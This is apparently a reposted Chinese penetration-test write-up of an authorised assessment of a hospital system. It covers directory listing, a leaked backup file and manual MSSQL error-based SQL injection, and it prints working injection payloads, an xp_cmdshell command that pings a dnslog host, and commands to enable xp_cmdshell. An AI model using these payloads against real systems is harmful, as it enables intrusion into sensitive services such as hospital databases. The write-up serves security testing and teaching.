Redian新闻
>
一次授权的未授权漏洞验证测试

一次授权的未授权漏洞验证测试

科技


0x01背景

接到一个项目工单,需要对某医院系统进行一次授权验证测试项目,客户目前提供了远程桌面连接地址和被测系统URL,密码还在申请中。

0x02信息收集

出于测试习惯,打开页面后先开始一个初始的信息收集,首先根据框架和扫描端口得到几个简单信息:

1.Net开发的系统
2.IIS中间件框架
3.Windows Server服务器
4.开放了数据库端口1433,SQLServer数据库
5.存在用户名枚举问题
6.没有验证码机制

开始对收集到的信息进行相关漏洞验证,首先看看有没有使用ueditor富文本编辑器,这块我是用的Tide知识星球里小伙伴发的攻防演练期间收集的列表进行目录爆破

用DirBuster加载字典爆破未遂

随后,对web应用和SqlServer数据库进行口令猜解均未遂。

开始对中间件下手,对目标进行Options请求,发现目标既没开PUT请求方式又非可利用的中间件版本

进行目录穿越测试的时候发现存在IIS目录浏览问题,看到hisxxxx.bak就兴奋了

把压缩包文件下载到远程桌面后进行翻阅,按照常规找到web.config

存在数据库的加密信息,之前见过Web.config SqlServer连接串解密的方法,但是受限于远程主机环境,无法进行解密操作。

继续翻阅压缩包文件,发现了一个url地址信息

打开后发现是一个医院xx系统,系统自带一个导航栏目,看起来像极了存在未授权访问漏洞的样子

0x03开始测试

功能还是挺多的,经过一番乱点,找到了几个查询页面,想用sqlmap跑一下,遇到系统环境问题,用了一段时间查询各种方法,没能解决。

遂尝试手动注入,由于攻防演练的快节奏,正常情况能用工具跑就不会用手工的坏毛病导致手动sql注入忘的差不多了,借此机会回忆一下

经过一番尝试,终于看到了曙光,报错注入

测试发现直接构造查询语句,直接返回400,通过fuzz,发现简单url编码一下就可以执行注入语句

查看一下数据库版本,@@version是mssql的全局变量,如果写成这样and @@version>0 那个后面的mssql就会强行把@@version强行转换成int类型与0比大小,但是失败,所以就会将数据库版本信息暴露出来

1' or @@version>0--

查一下当前连接数据库的用户,如果看到dbo转换类型识别,当前数据库的用户大概率是dba权限。

1' or User_Name()>0--

查询当前数据库名称

先查一下数据库名称,没什么问题,但这样从库-表-字段-数据手工确实有点费劲,花费了大量时间查询,发现表有点多,这里就不再贴图了,下面直接尝试写shell试试

1' or db_name()>0-

现在想要写shell了,sqlserver支持堆叠注入,现在还需要一个网站路径,aspx通过报错还是比较好找路径的,我们构造一个错误语句,得到一个web路径

执行ping命令,dnslog平台查看一下有无回显

' ;exec master..xp_cmdshell "ping ph3owt.dnslog.cn -n 2" --

先不提出不出网这回事,xp_cmdshell是关闭的

然而由于某不知名抗力,开启允许编辑高级选项和开启cmdshell竟然失败了

开启xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
开启允许编辑高级选项
EXEC sp_configure 'show advanced options', 1;

0x04 峰回路转

sql注入获取shell失败了,只能继续查看导航中页面,翻阅各种加载的js文件,一个个页面的源码查找。

在无意间发现在一个非常不起眼的页面的页面返回包中竟然有那种东西()

虽然口口声声说着我没有权限

下方却有一串注释了的h*s明文数据库用户名密码连接信息,我虽然不懂为什么 但我大受震撼

后面直接上攻防演练数据库操作神器,一键getshell。

0x05 小结

由于目前各行业信息系统随着攻防演练的推进,安全性在不断地提升,根据近期攻防演练情况来看,常规的弱口令及文件上传等手段获取权限相比以往困难了许多,所以更需要我们去注意一些细节,比如一些js、css、api接口、静态页面源码等平时不太注意的位置,可能会有惊喜出现。

认真去对待每一次日常的测试工作,对于测试的细粒度进行严格要求,持之以恒,定会有更大的收获。

往期推荐

敏感信息泄露

潮影在线免杀平台上线了

自动化渗透测试工具开发实践

【红蓝对抗】利用CS进行内网横向

一个Go版(更强大)的TideFinger

SRC资产导航监测平台Tsrc上线了

新潮信息-Tide安全团队2022年度总结

记一次实战攻防(打点-Edr-内网-横向-Vcenter)

E

N

D


知识星球产品及服务

团队内部平台:潮汐在线指纹识别平台 | 潮听漏洞情报平台 | 潮巡资产管理与威胁监测平台 | 潮汐网络空间资产测绘 | 潮声漏洞检测平台 | 在线免杀平台 | CTF练习平台 | 物联网固件检测平台 | SRC资产监控平台  | ......


星球分享方向:Web安全 | 红蓝对抗 | 移动安全 | 应急响应 | 工控安全 | 物联网安全 | 密码学 | 人工智能 | ctf 等方面的沟通及分享


星球知识wiki:红蓝对抗 | 漏洞武器库 | 远控免杀 | 移动安全 | 物联网安全 | 代码审计 | CTF | 工控安全 | 应急响应 | 人工智能 | 密码学 | CobaltStrike | 安全测试用例 | ......


星球网盘资料:安全法律法规 | 安全认证资料 | 代码审计 | 渗透安全工具 | 工控安全工具 | 移动安全工具 | 物联网安全 | 其它安全文库合辑  | ......

扫码加入一起学习吧~

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
强化学习再登Nature封面,自动驾驶安全验证新范式大幅减少测试里程#世界知识产权日# 知识产权的真正价值独家:十问十答:万亿美元级别五大件的未来就是芯片的未来爱在蓝天下 - 曲唱编:茜西高危漏洞预警 | 车联网开源组件命令执行漏洞被监测出霸权的恐惧:当年英国VS德国,今天美国VS中国曝光!澳洲移民局漏洞百出,大批留学生利用签证漏洞,靠这种手段拿PR,从大学跑路...BB鸭 | 比亚迪今年首次降价;小米一卡多号专利获授权;魅族20跑分曝光;快手测试本地生活小程序中伊签署联合声明,是美国霸权的终结,还是新冷战的开始?刚刚,史诗级逆转!我们必将见证霸权的坍塌直播预告|ELISA检测试剂盒的开发及其方法学验证不只是黑盒测试:测试工程师如何识别和消除代码坏气味?正版迪士尼授权的带防伪标签的钢笔礼盒装上市! 现在还赠送20个墨囊和一个可擦橡皮擦!一支钢笔,写一手好字~肖磊:硅谷银行破产与美元特权的反噬2022南美南极行(20)阿根廷 布宜诺斯艾利斯深度 | 刚发生的这件事情,敲响了美国霸权的丧钟!我国首个具备自主知识产权的工业操作系统是怎样炼成的?【智次方产业专访|工业互联网篇】聊聊 | 法国,能成为我们对抗霸权的盟友吗?史航涉嫌性骚扰:写给每个有点小钱有点小权的男性!如何防止自己从人退化成动物?一场关于ChatGPT话语权的深度思考:人类会在大模型中迷失自我吗?迪士尼正版授权骨传导耳机,久戴不痛,狂甩不掉,还有240小时超长待机!迪士尼正版授权!华为首席法务官宋柳平:如果不解决知识知识产权的司法判决赔偿额问题,就永远别谈世界定价权和话语权!今早的跑步,和每天吃4000卡的兄弟美元霸权的阑尾:“债务上限”为何反复发作?大话三国212:孙权的领导艺术,他为什么不敢公开说抗曹?直播预告:AI芯片设计验证利器——数据通路验证DPV解析中国女权的日本偶像,主要负责向中韩兜售“反思券”?这,是中国对抗霸权的终极武器!30万以上美国人有听力问题,听力测试是什么样的?什么情况需要进行听力测试?这次中俄联手,美帝霸权的梦魇!一文看清美元霸权的崩塌之路特朗普被刑诉, 创美国历史? 一文揭开总统特权的“后门”美剧《法官大人》再次冲击道德底线为什么美帝霸权的衰落近在眼前?闲说跨年在墨西哥城 (6c) 博物馆-瓦哈卡+奥尔梅克展厅
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。